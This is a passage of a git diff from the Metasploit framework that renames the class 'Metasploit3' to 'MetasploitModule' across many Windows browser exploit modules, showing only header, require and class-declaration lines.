b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb index a92886b94d..44636c8495 100644 --- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb +++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb index fe8ede5cbd..f70773b7a5 100644 --- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb +++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index 1b5560873d..fe938e1872 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index 4ab495e851..89936e7a39 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 921285149b..ab90c7164f 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index 3d3cdf9c3c..0333976af5 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index a45a935ef6..2ee2ccff3b 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index 7290b5d166..571769f23d 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 66f3e99668..5f083c52da 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/getgodm_http_response_bof.rb b/modules/exploits/windows/browser/getgodm_http_response_bof.rb index 28762797c1..1adf60aa07 100644 --- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb +++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index 1850394ce0..fe60d15fc8 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/greendam_url.rb b/modules/exploits/windows/browser/greendam_url.rb index a3394b541b..ee7e2634fe 100644 --- a/modules/exploits/windows/browser/greendam_url.rb +++ b/modules/exploits/windows/browser/greendam_url.rb @@ -21,7 +21,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb index ec3f7c8ed2..34a7758163 100644 --- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb +++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index 13fa3b651c..4ce1c99493 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb index 550395255f..efa03912ab 100644 --- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb +++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb index 55850db2a5..d6cbb5275a 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 9276a059e5..9cb5e338c4 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index bc4efcd457..82ed60807c 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index 5b907dc8a2..09b0439c0c 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb index e3d390f8eb..acff38f9ed 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb index 5c62ea02a1..6488beed3a 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index dd64b699b0..19f0929c35 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb index a56df9c525..873b2b876d 100644 --- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # heap spray :-/ include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb index a8488b29d4..76261ed22b 100644 --- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb +++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb index 772a924e42..1f261d420a 100644 --- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb +++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index f16b3b4c58..49dc3318e4 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index c966b6145b..88ea81859f 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 96a4f7cfc7..e002ede87f 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb index 96741d004e..d00bae6af6 100644 --- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb +++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index 4b49aa83b6..7481aebffb 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index 6db53caf87..bad5533df1 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index 09d208386c..1e498607a4 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Seh diff --git a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb index 1be71a45b7..6c8d41af0e 100644 --- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb +++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index caab7e277b..43c49d7789 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/util/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index fa0e081109..cdfeba1163 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 8abc7a8ae0..0a0583a308 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb index d9bc4a1265..66e44e1579 100644 --- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb index 9456b7d5b6..3f626ef961 100644 --- a/modules/exploits/windows/browser/intrust_annotatex_add.rb +++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb index 3e75330b62..dce454f29d 100644 --- a/modules/exploits/windows/browser/java_basicservice_impl.rb +++ b/modules/exploits/windows/browser/java_basicservice_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/browser/java_cmm.rb b/modules/exploits/windows/browser/java_cmm.rb index 7ca72c586c..dd6140d2f9 100644 --- a/modules/exploits/windows/browser/java_cmm.rb +++ b/modules/exploits/windows/browser/java_cmm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index cc88830088..1d3e0e9eea 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb index 52425ef4c4..c8a8cbcec7 100644 --- a/modules/exploits/windows/browser/java_docbase_bof.rb +++ b/modules/exploits/windows/browser/java_docbase_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/java_mixer_sequencer.rb b/modules/exploits/windows/browser/java_mixer_sequencer.rb index d6c31e3ecb..5817b6720e 100644 --- a/modules/exploits/windows/browser/java_mixer_sequencer.rb +++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index bed81f6b2e..063a6aef3d 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_double_quote.rb b/modules/exploits/windows/browser/java_ws_double_quote.rb index f57b207b6d..87ac933b9f 100644 --- a/modules/exploits/windows/browser/java_ws_double_quote.rb +++ b/modules/exploits/windows/browser/java_ws_double_quote.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index e832ba3f89..74323a296a 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index c72124cf60..12a30108ab 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index c6cce237eb..04f1329b5c 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb index 4502c63b37..601a07fd74 100644 --- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb +++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 4397a6b09a..96f993ef29 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index 4f9d33b47f..9dd79abcbb 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index d3a8fb15d1..038cb41bda 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index dc41c99c65..c15b5dcd61 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/malwarebytes_update_exec.rb b/modules/exploits/windows/browser/malwarebytes_update_exec.rb index db740e9bdd..7714407a8c 100644 --- a/modules/exploits/windows/browser/malwarebytes_update_exec.rb +++ b/modules/exploits/windows/browser/malwarebytes_update_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # Would be Great except MBAE doesn't version check include Msf::Exploit::EXE diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb index 89d894554c..f501d3b651 100644 --- a/modules/exploits/windows/browser/maxthon_history_xcs.rb +++ b/modules/exploits/windows/browser/maxthon_history_xcs.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index ff4cf01a15..0bd3a05ebf 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb index 2d39cac1ad..eca4fd4e7d 100644 --- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb +++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 525a9b842d..9828cf2c15 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index e5ab64c876..e8877e1ed5 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb index 7cba8400bc..e431231c46 100644 --- a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb +++ b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git 